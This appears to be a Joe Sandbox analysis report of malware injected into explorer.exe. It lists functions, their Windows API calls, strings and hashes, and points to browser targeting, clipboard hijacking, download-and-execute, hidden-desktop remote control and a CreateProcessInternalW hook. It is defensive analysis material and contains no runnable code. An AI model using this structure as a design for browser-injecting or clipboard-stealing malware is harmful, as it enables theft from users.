String ID: --disable-http2 --use-spdy=off --disable-quic$AVGBrowser.exe$AvastBrowser.exe$Diamotrixed$\\.\pipe\%s$brave.exe$browser.exe$chrome.exe$msedge.exe$opera.exe$trusteer
API String ID: 1527040651-3547472259
Opcode ID: 58e5fa22f7c873d686ce76318caff127ff3cb5475a8f9787b37d37c67098cb26
Instruction ID: 2b3fc9e18c295eb50cab00d1be3d7484888dc5cd67a2ea58b0be13473a7c4d75
Opcode Fuzzy Hash: 58e5fa22f7c873d686ce76318caff127ff3cb5475a8f9787b37d37c67098cb26
Instruction Fuzzy Hash: 54A17572204F82C6EB14DF26F854B9A77B4F789B95F448026DA8A47B18DF3CD249CB50

Function 0F3C69E4 Relevance: 21.1, APIs: 14, Instructions: 136
stringfilenetworkCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32 ref: 0F3C6A7C
InternetCrackUrlA.WININET ref: 0F3C6A91

Part of subcall function 0F3C4520: lstrcpy.KERNEL32 ref: 0F3C4573
Part of subcall function 0F3C4520: lstrcatA.KERNEL32 ref: 0F3C4582
Part of subcall function 0F3C4520: lstrcatA.KERNEL32 ref: 0F3C4594
Part of subcall function 0F3C4520: lstrcatA.KERNEL32 ref: 0F3C45A6
Part of subcall function 0F3C4520: lstrcatA.KERNEL32 ref: 0F3C45B5
Part of subcall function 0F3C4520: lstrcatA.KERNEL32 ref: 0F3C45C7
Part of subcall function 0F3C4520: lstrcatA.KERNEL32 ref: 0F3C45E3
Part of subcall function 0F3C4520: wsprintfA.USER32 ref: 0F3C45F9
Part of subcall function 0F3C4520: lstrcatA.KERNEL32 ref: 0F3C4609
Part of subcall function 0F3C4520: lstrcatA.KERNEL32 ref: 0F3C461B
Part of subcall function 0F3C4520: lstrcatA.KERNEL32 ref: 0F3C462D
Part of subcall function 0F3C4520: WSAStartup.WS2_32 ref: 0F3C463F
Part of subcall function 0F3C4520: socket.WS2_32 ref: 0F3C465F
Part of subcall function 0F3C4520: gethostbyname.WS2_32 ref: 0F3C4679
Part of subcall function 0F3C4520: memcpy.MSVCRT ref: 0F3C4699
Part of subcall function 0F3C4520: htons.WS2_32 ref: 0F3C46A9
Part of subcall function 0F3C4520: connect.WS2_32 ref: 0F3C46C0
Part of subcall function 0F3C4520: lstrlenA.KERNEL32 ref: 0F3C46D3
Part of subcall function 0F3C4520: send.WS2_32 ref: 0F3C46E7

PathFindFileNameA.SHLWAPI ref: 0F3C6B08
GetTempPathA.KERNEL32 ref: 0F3C6B26
GetTempFileNameA.KERNEL32 ref: 0F3C6B3C
lstrcatA.KERNEL32 ref: 0F3C6B4C
lstrcatA.KERNEL32 ref: 0F3C6B58
CreateFileA.KERNEL32 ref: 0F3C6B83
WriteFile.KERNEL32 ref: 0F3C6BA9
??3@YAXPEAX@Z.MSVCRT ref: 0F3C6BB8
CloseHandle.KERNEL32 ref: 0F3C6BC1
ShellExecuteA.SHELL32 ref: 0F3C6BED
CloseHandle.KERNEL32 ref: 0F3C6BFC
??3@YAXPEAX@Z.MSVCRT ref: 0F3C6C07

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: lstrcat$File$??3@CloseHandleNamePathTemplstrlen$CrackCreateExecuteFindInternetShellStartupWriteconnectgethostbynamehtonslstrcpymemcpysendsocketwsprintf
String ID:
API String ID: 2207453364-0
Opcode ID: eb2a70d6ba61a70606d257063704161deacf3da45e0fbe9ce99daad9c34fbcb0
Instruction ID: 4c601dac5ae115d77127492fe2980b07f718c63971cb6eb9690e8d7c2a7da578
Opcode Fuzzy Hash: eb2a70d6ba61a70606d257063704161deacf3da45e0fbe9ce99daad9c34fbcb0
Instruction Fuzzy Hash: D5515E32B04B4186EB20CF66E8547AE77A1F788BA4F444129DE4D47B68DF7CC688CB40

Function 0F3DA104 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 63
stringthreadCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32 ref: 0F3DA135
PathFindFileNameA.SHLWAPI ref: 0F3DA140
lstrcmpiA.KERNEL32 ref: 0F3DA153
CreateThread.KERNEL32 ref: 0F3DA17F
lstrcmpiA.KERNEL32 ref: 0F3DA194
CloseHandle.KERNEL32 ref: 0F3DA1BA
lstrcmpiA.KERNEL32 ref: 0F3DA1CF
lstrcmpiA.KERNEL32 ref: 0F3DA1ED

Strings

explorer.exe, xrefs: 0F3DA146
msedge.exe, xrefs: 0F3DA1E3
firefox.exe, xrefs: 0F3DA18A
chrome.exe, xrefs: 0F3DA1C5

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: lstrcmpi$FileName$CloseCreateFindHandleModulePathThread
String ID: chrome.exe$explorer.exe$firefox.exe$msedge.exe
API String ID: 2683099952-590483109
Opcode ID: 874950943a249c877d6e1838912ccb95b0977777b475de4bf467ea38f4e5ba2a
Instruction ID: ff54049ab6d9ebec147452702bafce80fdca06a94d89a820ed892ffbbb02a665
Opcode Fuzzy Hash: 874950943a249c877d6e1838912ccb95b0977777b475de4bf467ea38f4e5ba2a
Instruction Fuzzy Hash: 5E218021614B4695FF20EB72FC443AD6361AB88BB1F841039E94A46A67EF7CC74CE750

Function 08CBBF44 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 45
libraryloadermemoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNEL32 ref: 08CBBF61
GetModuleHandleW.KERNEL32 ref: 08CBBF7D
GetProcAddress.KERNEL32 ref: 08CBBF92
GetModuleHandleW.KERNEL32 ref: 08CBBFAC
GetProcAddress.KERNEL32 ref: 08CBBFC1

Strings

CreateProcessInternalW, xrefs: 08CBBF88
Kernel32.dll, xrefs: 08CBBF70
KernelBase.dll, xrefs: 08CBBFA5
CreateProcessInternalW, xrefs: 08CBBFB7

Memory Dump Source

Source File: 00000002.00000002.3156915026.0000000008CB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 08CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8cb0000_explorer.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc$CreateHeap
String ID: CreateProcessInternalW$CreateProcessInternalW$Kernel32.dll$KernelBase.dll
API String ID: 3177369204-2552458873
Opcode ID: 4d3072ef696aade75c17de1f9947264c645c80e7f162884d0f5ec5e2810a1d2a
Instruction ID: 9970443adda07e5c136c5b9a74ecc55ac64f7ee80d66cb09245f42d4a72226b0
Opcode Fuzzy Hash: 4d3072ef696aade75c17de1f9947264c645c80e7f162884d0f5ec5e2810a1d2a
Instruction Fuzzy Hash: 35112D68612F5186FF69EFB5A855FA433B4BB84712F48843EC98E42350EF3C8585C720

Function 0F3C68F0 Relevance: 10.6, APIs: 7, Instructions: 62
stringsleepCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcpy.KERNEL32 ref: 0F3C6938

Part of subcall function 0F3C6130: EnterCriticalSection.KERNEL32 ref: 0F3C6170
Part of subcall function 0F3C6130: RtlInitializeCriticalSection.NTDLL ref: 0F3C617D
Part of subcall function 0F3C6130: lstrcpy.KERNEL32 ref: 0F3C61AA
Part of subcall function 0F3C6130: lstrcpy.KERNEL32 ref: 0F3C61CD
Part of subcall function 0F3C6130: lstrcatA.KERNEL32 ref: 0F3C61DD
Part of subcall function 0F3C6130: lstrcatA.KERNEL32 ref: 0F3C61ED
Part of subcall function 0F3C6130: LeaveCriticalSection.KERNEL32 ref: 0F3C624C
Part of subcall function 0F3C6130: memcpy.MSVCRT ref: 0F3C6263
Part of subcall function 0F3C6130: lstrlenA.KERNEL32 ref: 0F3C6270

lstrcmp.KERNEL32 ref: 0F3C695F
StrChrA.SHLWAPI ref: 0F3C6978
StrStrA.SHLWAPI ref: 0F3C698B
strtol.MSVCRT ref: 0F3C69B2
??3@YAXPEAX@Z.MSVCRT ref: 0F3C69CB
Sleep.KERNEL32 ref: 0F3C69D6

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: CriticalSectionlstrcpy$lstrcat$??3@EnterInitializeLeaveSleeplstrcmplstrlenmemcpystrtol
String ID:
API String ID: 1856114479-0
Opcode ID: e25bd308d87e3a947bc2d9e8e8747897f02e1ecd5d267791c423b28eb347718d
Instruction ID: 52b96ea44cafe7d918459374ecd9702987c61b519e31096d7d3ed031113da0b0
Opcode Fuzzy Hash: e25bd308d87e3a947bc2d9e8e8747897f02e1ecd5d267791c423b28eb347718d
Instruction Fuzzy Hash: 6F219D21615B41C5EB24DF21E84436D77A5FB88FA0F484038CA8E47B65EF3CD649C784

Function 0F3CF94C Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 247
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0F3CFE98: OpenClipboard.USER32 ref: 0F3CFEAE
Part of subcall function 0F3CFE98: GetClipboardData.USER32 ref: 0F3CFEBB
Part of subcall function 0F3CFE98: GlobalLock.KERNEL32 ref: 0F3CFECC
Part of subcall function 0F3CFE98: GlobalUnlock.KERNEL32 ref: 0F3CFEDD
Part of subcall function 0F3CFE98: CloseClipboard.USER32 ref: 0F3CFEE3

Part of subcall function 0F3D006C: GlobalAlloc.KERNEL32 ref: 0F3D0094
Part of subcall function 0F3D006C: GlobalLock.KERNEL32 ref: 0F3D00AB
Part of subcall function 0F3D006C: GlobalUnlock.KERNEL32 ref: 0F3D00C3
Part of subcall function 0F3D006C: OpenClipboard.USER32 ref: 0F3D00CB
Part of subcall function 0F3D006C: EmptyClipboard.USER32 ref: 0F3D00D1
Part of subcall function 0F3D006C: SetClipboardData.USER32 ref: 0F3D00DF
Part of subcall function 0F3D006C: CloseClipboard.USER32 ref: 0F3D00E5

Sleep.KERNEL32 ref: 0F3CFD94

Strings

EC8TNV4TJis1EzAgWxY+EwEWNzEmNAIdRAABElglKicMMw==, xrefs: 0F3CF9D0
dV4CPSwzJx8ODjAtKx02CAxJBhMCNR0HP18fBg8kXCMgKw==, xrefs: 0F3CF98B
CAAlOSRNBz0SPTkvIB1GHwY/LTNUNzclEyUOIgIYKl4tRQ==, xrefs: 0F3CFA15
Diamotrix, xrefs: 0F3CF977
dBFTDFkSQwpJJlFZWFlAFFsdIFlXX1tGSgtIfFgCXgxCSl9NfFpWVVYX, xrefs: 0F3CFA5A

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptySleep
String ID: CAAlOSRNBz0SPTkvIB1GHwY/LTNUNzclEyUOIgIYKl4tRQ==$Diamotrix$EC8TNV4TJis1EzAgWxY+EwEWNzEmNAIdRAABElglKicMMw==$dBFTDFkSQwpJJlFZWFlAFFsdIFlXX1tGSgtIfFgCXgxCSl9NfFpWVVYX$dV4CPSwzJx8ODjAtKx02CAxJBhMCNR0HP18fBg8kXCMgKw==
API String ID: 2992153386-2234792053
Opcode ID: d9bac0a79613fcca47700cbee003d1b65288520218388fee38a63978c72ece60
Instruction ID: dc9a08b825adbea38cbf41e5dfd596ac135f6b30daf8c0600f0f4abd0428694c
Opcode Fuzzy Hash: d9bac0a79613fcca47700cbee003d1b65288520218388fee38a63978c72ece60
Instruction Fuzzy Hash: 84A11F66204B86A5CF10FB65E8543DE6321FB95798FC0402ADA8D47A5EEF6CCB09C7C0

Function 0F3C652C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowsDirectoryA.KERNEL32 ref: 0F3C6570
GetVolumeInformationA.KERNEL32 ref: 0F3C65BF
wsprintfA.USER32 ref: 0F3C661C

Strings

{%08lX%04lX%lu}, xrefs: 0F3C660E

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: DirectoryInformationVolumeWindowswsprintf
String ID: {%08lX%04lX%lu}
API String ID: 3001812590-1877128471
Opcode ID: adb46bb215b8b7846f3099994807b5415528fffdb88278e748a75d101c16c107
Instruction ID: 60592fd4688daf2f3ee53788c7fbbefd1c7ec2aafc89d4b95fbf5691862ae205
Opcode Fuzzy Hash: adb46bb215b8b7846f3099994807b5415528fffdb88278e748a75d101c16c107
Instruction Fuzzy Hash: 81214B326087C0CAD721CF75E8903DEBBA0F799754F54452AE78983A2CDB78C649CB40

Function 08CB19EC Relevance: 4.6, APIs: 3, Instructions: 73
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32 ref: 08CB1A36
VirtualProtect.KERNEL32 ref: 08CB1A9D
FlushInstructionCache.KERNEL32 ref: 08CB1AB2

Memory Dump Source

Source File: 00000002.00000002.3156915026.0000000008CB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 08CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8cb0000_explorer.jbxd

Yara matches

Similarity

API ID: ProtectVirtual$CacheFlushInstruction
String ID:
API String ID: 882653843-0
Opcode ID: b6463cc818fc626b3a6d75c665f56e6a94a2aae3856024e65fd29bf126e9d28e
Instruction ID: 6edf07cb7298292b0f6be214318fc4af40e444264ee9915290fe0edf5af9fe15
Opcode Fuzzy Hash: b6463cc818fc626b3a6d75c665f56e6a94a2aae3856024e65fd29bf126e9d28e
Instruction Fuzzy Hash: 7E31DD63208AC086D7108F36A5503A97B70F305F89F0C8216DF994B79ACB3CE452C764

Function 08CB197C Relevance: 4.5, APIs: 3, Instructions: 31threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

OpenThread.KERNEL32 ref: 08CB19A1
ResumeThread.KERNEL32 ref: 08CB19B2
CloseHandle.KERNEL32 ref: 08CB19BB

Memory Dump Source

Source File: 00000002.00000002.3156915026.0000000008CB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 08CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8cb0000_explorer.jbxd

Yara matches

Similarity

API ID: Thread$CloseHandleOpenResume
String ID:
API String ID: 3509856837-0
Opcode ID: 30d60d981685ac0fb098c174b9d32aa8ee41bb07c3d92f07860992837807bdbc
Instruction ID: d0f23286bf3153b97d6bfa5e13ccb086ba85fc5d5e9ca2a406622b633e4c0f59
Opcode Fuzzy Hash: 30d60d981685ac0fb098c174b9d32aa8ee41bb07c3d92f07860992837807bdbc
Instruction Fuzzy Hash: 8DF01432A15E8082E708CB56E995B597770F789B90F08C02ADB9A03724DF38D5A6CB10

Non-executed Functions

Function 0F3D9078 Relevance: 89.7, APIs: 49, Strings: 2, Instructions: 494windownetworkregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 0F3D89BC: WSAStartup.WS2_32 ref: 0F3D89D8

SetThreadDesktop.USER32 ref: 0F3D90A6
send.WS2_32 ref: 0F3D90BD

Part of subcall function 0F3D9AB8: send.WS2_32 ref: 0F3D9ACC

recv.WS2_32 ref: 0F3D90F0
CreateThread.KERNEL32 ref: 0F3D9115
recv.WS2_32 ref: 0F3D9148
recv.WS2_32 ref: 0F3D916D
recv.WS2_32 ref: 0F3D918A
ScreenToClient.USER32 ref: 0F3D91EF
SHGetFolderPathA.SHELL32 ref: 0F3D923D
lstrcatA.KERNEL32 ref: 0F3D9251
CreateProcessA.KERNEL32 ref: 0F3D92B9
RegOpenKeyExA.ADVAPI32 ref: 0F3D92F4
RegQueryValueExA.ADVAPI32 ref: 0F3D932F
RegSetValueExA.ADVAPI32 ref: 0F3D9361
GetWindowsDirectoryA.KERNEL32 ref: 0F3D938D
lstrcatA.KERNEL32 ref: 0F3D93A1
lstrcatA.KERNEL32 ref: 0F3D93B5
CreateProcessA.KERNEL32 ref: 0F3D941D
Sleep.KERNEL32 ref: 0F3D942F
FindWindowA.USER32 ref: 0F3D943E
SHAppBarMessage.SHELL32 ref: 0F3D9465
RegSetValueExA.ADVAPI32 ref: 0F3D9490
RegCloseKey.ADVAPI32 ref: 0F3D949B
WindowFromPoint.USER32 ref: 0F3D94AE
WindowFromPoint.USER32 ref: 0F3D94E9
SendMessageA.USER32 ref: 0F3D951D
PostMessageA.USER32 ref: 0F3D954E
GetWindowPlacement.USER32 ref: 0F3D9567
GetWindowLongA.USER32 ref: 0F3D95A8
SetWindowLongA.USER32 ref: 0F3D95BA
SendMessageA.USER32 ref: 0F3D95CD
FindWindowA.USER32 ref: 0F3D95F6
GetWindowRect.USER32 ref: 0F3D9606
PtInRect.USER32 ref: 0F3D9615

Part of subcall function 0F3DA040: lstrcpy.KERNEL32 ref: 0F3DA071
Part of subcall function 0F3DA040: lstrcatA.KERNEL32 ref: 0F3DA082
Part of subcall function 0F3DA040: CreateProcessA.KERNEL32 ref: 0F3DA0F3

PostMessageA.USER32 ref: 0F3D962D
recv.WS2_32 ref: 0F3D9646
TerminateThread.KERNEL32 ref: 0F3D9663
RealGetWindowClass.USER32 ref: 0F3D96B1
lstrcmp.KERNEL32 ref: 0F3D96C5
SendMessageA.USER32 ref: 0F3D96E1
MenuItemFromPoint.USER32 ref: 0F3D96F4
GetMenuItemID.USER32 ref: 0F3D9702
PostMessageA.USER32 ref: 0F3D9716
SendMessageA.USER32 ref: 0F3D9758
GetWindowRect.USER32 ref: 0F3D9781
MoveWindow.USER32 ref: 0F3D980C
ScreenToClient.USER32 ref: 0F3D982A
ChildWindowFromPoint.USER32 ref: 0F3D9838
PostMessageA.USER32 ref: 0F3D9878

Strings

Button, xrefs: 0F3D95E3
AVE_MARIA, xrefs: 0F3D90AF

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: Window$Message$recv$CreateFromPointPostSendlstrcat$ProcessRectThreadValue$ClientFindItemLongMenuScreensend$ChildClassCloseDesktopDirectoryFolderMoveOpenPathPlacementQueryRealSleepStartupTerminateWindowslstrcmplstrcpy
String ID: AVE_MARIA$Button
API String ID: 2928571645-257500010
Opcode ID: 36af61125e1c30519cf6cc6c0f0e391ba7867fcb109cd78c9c85eb73fbd3af0c
Instruction ID: ab147eb3db188ee8e0a438f3570aa462a07a755fa9a8a99c91db36aa95aca670
Opcode Fuzzy Hash: 36af61125e1c30519cf6cc6c0f0e391ba7867fcb109cd78c9c85eb73fbd3af0c
Instruction Fuzzy Hash: AB226F3271579286EB209F35E8547AE77A5F788BA8F804135EE4A47F69DF38C248D700

Function 0F3D8D2C Relevance: 45.7, APIs: 25, Strings: 1, Instructions: 208windowCOMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0F3D8D50
GetWindowRect.USER32 ref: 0F3D8D5E
GetDC.USER32 ref: 0F3D8D66
CreateCompatibleDC.GDI32 ref: 0F3D8D72
CreateCompatibleBitmap.GDI32 ref: 0F3D8D87
SelectObject.GDI32 ref: 0F3D8D96

Part of subcall function 0F3D8CD0: GetTopWindow.USER32 ref: 0F3D8CE5
Part of subcall function 0F3D8CD0: GetWindow.USER32 ref: 0F3D8D0E

CreateCompatibleBitmap.GDI32 ref: 0F3D8DDF
CreateCompatibleDC.GDI32 ref: 0F3D8DEB
SelectObject.GDI32 ref: 0F3D8DFA
SetStretchBltMode.GDI32 ref: 0F3D8E08
StretchBlt.GDI32 ref: 0F3D8E44
DeleteObject.GDI32 ref: 0F3D8E4D
DeleteDC.GDI32 ref: 0F3D8E56
??3@YAXPEAX@Z.MSVCRT ref: 0F3D8E96
??3@YAXPEAX@Z.MSVCRT ref: 0F3D8EA3
??3@YAXPEAX@Z.MSVCRT ref: 0F3D8EB0
_malloc_dbg.MSVCRT ref: 0F3D8EBC
_malloc_dbg.MSVCRT ref: 0F3D8ECE
_malloc_dbg.MSVCRT ref: 0F3D8EE0
GetDIBits.GDI32 ref: 0F3D8F23
DeleteObject.GDI32 ref: 0F3D8F2C
ReleaseDC.USER32 ref: 0F3D8F37
DeleteDC.GDI32 ref: 0F3D8F40
memcpy.MSVCRT ref: 0F3D8FAA
memcpy.MSVCRT ref: 0F3D904D

Strings

, xrefs: 0F3D8E12

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: CompatibleCreateDeleteObjectWindow$??3@_malloc_dbg$BitmapSelectStretchmemcpy$BitsDesktopModeRectRelease
String ID:
API String ID: 2596202611-3916222277
Opcode ID: 4262a13877639d82f982d1eae1e36bb45b7eb76710138ab36d42033217d0887a
Instruction ID: 1f8c1f92f621047d780171297ceae2db44050c580f899caa5c77ab1201bb9c68
Opcode Fuzzy Hash: 4262a13877639d82f982d1eae1e36bb45b7eb76710138ab36d42033217d0887a
Instruction Fuzzy Hash: 3F91AE766047428AEB20DF25F854B2A77A1F789BA0F814239DE5B43B20CF3DD948DB40

Function 0C37C979 Relevance: 41.6, APIs: 33, Instructions: 351COMMON

Download Yara Rule

APIs

_CxxThrowException.LIBCMT ref: 0C37C9A7
_CxxThrowException.LIBCMT ref: 0C37C9C7
_CxxThrowException.LIBCMT ref: 0C37C9E7
_CxxThrowException.LIBCMT ref: 0C37CA07
_CxxThrowException.LIBCMT ref: 0C37CA3B
_CxxThrowException.LIBCMT ref: 0C37CA6F
_CxxThrowException.LIBCMT ref: 0C37CAA3
_CxxThrowException.LIBCMT ref: 0C37CABA
_CxxThrowException.LIBCMT ref: 0C37CAD1
_CxxThrowException.LIBCMT ref: 0C37CAE8
_CxxThrowException.LIBCMT ref: 0C37CAFF
_CxxThrowException.LIBCMT ref: 0C37CB16
_CxxThrowException.LIBCMT ref: 0C37CB2D
_CxxThrowException.LIBCMT ref: 0C37CB44
_CxxThrowException.LIBCMT ref: 0C37CB5B
_CxxThrowException.LIBCMT ref: 0C37CB72
_CxxThrowException.LIBCMT ref: 0C37CB89
_CxxThrowException.LIBCMT ref: 0C37CBA9
_CxxThrowException.LIBCMT ref: 0C37CBC9
_CxxThrowException.LIBCMT ref: 0C37CBE9
_CxxThrowException.LIBCMT ref: 0C37CC09
_CxxThrowException.LIBCMT ref: 0C37CC33
_CxxThrowException.LIBCMT ref: 0C37CC57
_CxxThrowException.LIBCMT ref: 0C37CC7B
_CxxThrowException.LIBCMT ref: 0C37CC9B
_CxxThrowException.LIBCMT ref: 0C37CCD2
_CxxThrowException.LIBCMT ref: 0C37CCE9
_CxxThrowException.LIBCMT ref: 0C37CD1D
_CxxThrowException.LIBCMT ref: 0C37CD51
_CxxThrowException.LIBCMT ref: 0C37CD71
_CxxThrowException.LIBCMT ref: 0C37CD91
_CxxThrowException.LIBCMT ref: 0C37CDB1
_CxxThrowException.LIBCMT ref: 0C37CDD1

Memory Dump Source

Source File: 00000002.00000002.3176672303.000000000C350000.00000020.00000001.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_c350000_explorer.jbxd

Yara matches

Similarity

API ID: ExceptionThrow
String ID:
API String ID: 432778473-0
Opcode ID: 440c83a82278f6d8b5a89e2e74b785a7168127761de30ce95c5f4b692ff4a6da
Instruction ID: ee942e0bbffa50d3f98c0c88ac2e6188cbafb783feb063d4e7020da90e882e8e
Opcode Fuzzy Hash: 440c83a82278f6d8b5a89e2e74b785a7168127761de30ce95c5f4b692ff4a6da
Instruction Fuzzy Hash: 09B15F62725B90CBD71CFE32A8014AE63A6F7D4788B08D935AD5A8BB1CCF74C5158F41

Function 0F3ED579 Relevance: 41.6, APIs: 33, Instructions: 351COMMON

Download Yara Rule

APIs

_CxxThrowException.LIBCMT ref: 0F3ED5A7

Part of subcall function 0F3DC474: RtlPcToFileHeader.KERNEL32 ref: 0F3DC503
Part of subcall function 0F3DC474: RaiseException.KERNEL32 ref: 0F3DC542

_CxxThrowException.LIBCMT ref: 0F3ED5C7
_CxxThrowException.LIBCMT ref: 0F3ED5E7
_CxxThrowException.LIBCMT ref: 0F3ED607
_CxxThrowException.LIBCMT ref: 0F3ED63B
_CxxThrowException.LIBCMT ref: 0F3ED66F
_CxxThrowException.LIBCMT ref: 0F3ED6A3
_CxxThrowException.LIBCMT ref: 0F3ED6BA
_CxxThrowException.LIBCMT ref: 0F3ED6D1
_CxxThrowException.LIBCMT ref: 0F3ED6E8
_CxxThrowException.LIBCMT ref: 0F3ED6FF
_CxxThrowException.LIBCMT ref: 0F3ED716
_CxxThrowException.LIBCMT ref: 0F3ED72D
_CxxThrowException.LIBCMT ref: 0F3ED744
_CxxThrowException.LIBCMT ref: 0F3ED75B
_CxxThrowException.LIBCMT ref: 0F3ED772
_CxxThrowException.LIBCMT ref: 0F3ED789
_CxxThrowException.LIBCMT ref: 0F3ED7A9
_CxxThrowException.LIBCMT ref: 0F3ED7C9
_CxxThrowException.LIBCMT ref: 0F3ED7E9
_CxxThrowException.LIBCMT ref: 0F3ED809
_CxxThrowException.LIBCMT ref: 0F3ED833
_CxxThrowException.LIBCMT ref: 0F3ED857
_CxxThrowException.LIBCMT ref: 0F3ED87B
_CxxThrowException.LIBCMT ref: 0F3ED89B
_CxxThrowException.LIBCMT ref: 0F3ED8D2
_CxxThrowException.LIBCMT ref: 0F3ED8E9
_CxxThrowException.LIBCMT ref: 0F3ED91D
_CxxThrowException.LIBCMT ref: 0F3ED951
_CxxThrowException.LIBCMT ref: 0F3ED971
_CxxThrowException.LIBCMT ref: 0F3ED991
_CxxThrowException.LIBCMT ref: 0F3ED9B1
_CxxThrowException.LIBCMT ref: 0F3ED9D1

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: Exception$Throw$FileHeaderRaise
String ID:
API String ID: 3102897148-0
Opcode ID: 21f7fae289d1fce79dba3d8c4766c072887fd8dcb9631de80a8f61fc9e2d6b93
Instruction ID: df00abd9119e13312ec34f9010bcc8113437448e7ebdbb7d2fc5a4aea69586de
Opcode Fuzzy Hash: 21f7fae289d1fce79dba3d8c4766c072887fd8dcb9631de80a8f61fc9e2d6b93
Instruction Fuzzy Hash: 37B17063714B808AD71DFF73B8014BB23A6A7D97D4B08E539BE994B65ACF38C5118780

Function 0F3D9CD4 Relevance: 36.2, APIs: 24, Instructions: 167stringfileprocessCOMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32 ref: 0F3D9D2E
lstrcatA.KERNEL32 ref: 0F3D9D42
lstrcpy.KERNEL32 ref: 0F3D9D6E
lstrcatA.KERNEL32 ref: 0F3D9D82
CreateFileA.KERNEL32 ref: 0F3D9DAC
GetFileSize.KERNEL32 ref: 0F3D9DC4
_malloc_dbg.MSVCRT ref: 0F3D9DCF
ReadFile.KERNEL32 ref: 0F3D9DEC
StrStrA.SHLWAPI ref: 0F3D9E00
StrStrA.SHLWAPI ref: 0F3D9E24
StrStrA.SHLWAPI ref: 0F3D9E40
lstrcpy.KERNEL32 ref: 0F3D9E7D
lstrcatA.KERNEL32 ref: 0F3D9E8E
lstrcpy.KERNEL32 ref: 0F3D9EAC
lstrcatA.KERNEL32 ref: 0F3D9EBE
lstrcpy.KERNEL32 ref: 0F3D9EF4
lstrcatA.KERNEL32 ref: 0F3D9F05
lstrcatA.KERNEL32 ref: 0F3D9F16
lstrcatA.KERNEL32 ref: 0F3D9F27
lstrcatA.KERNEL32 ref: 0F3D9F38
lstrcatA.KERNEL32 ref: 0F3D9F49
CreateProcessA.KERNEL32 ref: 0F3D9FB4
CloseHandle.KERNEL32 ref: 0F3D9FBD
??3@YAXPEAX@Z.MSVCRT ref: 0F3D9FC6

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$File$Create$??3@CloseFolderHandlePathProcessReadSize_malloc_dbg
String ID:
API String ID: 3556359532-0
Opcode ID: 2eab3bbb786823848a9fdf89a6c5b19ada60262e224be649d05a0aa3bbf1e75b
Instruction ID: 4ff0b1055087bfbdd684a8c73f7708d979d0533671cdb5a62ca6556249d02b0c
Opcode Fuzzy Hash: 2eab3bbb786823848a9fdf89a6c5b19ada60262e224be649d05a0aa3bbf1e75b
